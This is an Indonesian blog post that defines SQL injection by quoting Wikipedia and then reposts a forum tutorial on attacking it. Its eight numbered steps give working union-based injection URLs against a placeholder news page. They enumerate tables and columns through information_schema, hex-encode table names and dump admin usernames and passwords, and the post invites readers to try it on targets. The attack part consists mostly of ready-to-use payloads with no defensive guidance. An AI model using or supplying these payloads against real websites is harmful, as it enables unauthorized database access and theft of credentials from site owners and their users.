sql injection maenan … grey

SQL injection adalah kegiatan menyisipkan perintah SQL kepada suatu statement SQL yang ada pada aplikasi yang sedang berjalan. Dengan kata lain SQL injection ini merupakan suatu tehnik pengeksploitasi pada web apilikasi yang didalamnya menggunakan database untuk penyimpanan datanya. Terjadinya SQL injection tersebut dikarenakan security atau keamanan pada level aplikasi (dalam hal ini aplikasi web) yang masih kurang sempurna.

Sql Injection merupakan salah satu tehnik hacking web yang sampai sekarang ini masih bisa di gunakan, akan tetapi gw tidak akan menjelaskan secara detail cara menggunakan nya, pasal nya kurang begitu paham dengan hack – hack an, gw lebih suka mendevelop, memodifikasi, mendesain sebegitu rupa hingga sedap dipandang, mudah dikenal sama google, tidak berat (loading lama) ketika di akses.

SQL injection is an often used technique to attack databases through a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g. dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in a website’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. [http://en.wikipedia.org/wiki/SQL_injection]

le’s funckin’ this shit dude,  black, white, grey what ever lah …
Dibawah ini salah satu kiriman di sebuah forum tapi gw lupa forum yang mana :mrgreen: dan yang di bertikut sudah jadul alias tulisan sedikit kurang gress, namun yang namnya ilmu tidak akan pernah basi, pengen nyoba silahkan moggo :mrgreen:

[ Step 1 ]

Carilah target
Misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:

[site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

[ Step 2 ]

Mencari dan menghitung jumlah table yang ada dalam databasenya…gunakan perintah: order by

Contoh:

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

Ceklah secara step by step (satu persatu)… Misal:

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

Sehingga muncul error atau hilang pesan error…

Misal: [site]/berita.php?id=-100+order+by+9–
Berarti yang kita ambil adalah sampai angka 8 . Menjadi [site]/berita.php?id=-100+order+by+8–

[ Step 3 ]

untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 9

maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5 gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada angka yg keluar tadi

misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

Lihat versi yang digunakan seumpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

[ Step 4 ]

Untuk menampilkan table yang ada pada web tersebut adalah perintah table_name >>> dimasukan pada angka yangg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables– Seumpama table yang muncul adalah “admin”

[ Step 5 ]

untuk menampilkan semua isi dari table tersebut adalah perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
perintah

+from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

[ Step 6 ]

Perintah group_concat(column_name)

>>> dimasukan pada angka yang keluar tadi

perintah +from+information_schema.columns+where+table_name=0xhexa– >>>

dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
Website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

Contoh

kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E–

[ Step 7 ]

Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

Contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

[ Step 8 ] 1
Tahap terakhir mencari halaman admin atau login. nah itu tugas ente pada, begimana caranye .. yeah .. google it :mrgreen:

Last .. update 12 April jam 3.39
i wanna ask, when site pawned what you gonna do, like this check it out , oh craps …!  the world gotta changed, are u called hacker huh ? SQL injection adalah tehnik ada yang bilang art of hacking atau what ever lah, menurut gw itu ******in code seperti kata Crew ACL Aulia Fitri menebang pohon hanya lima menit, tapi menumbuhkan pohon butuh lima tahun.

Iklan

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s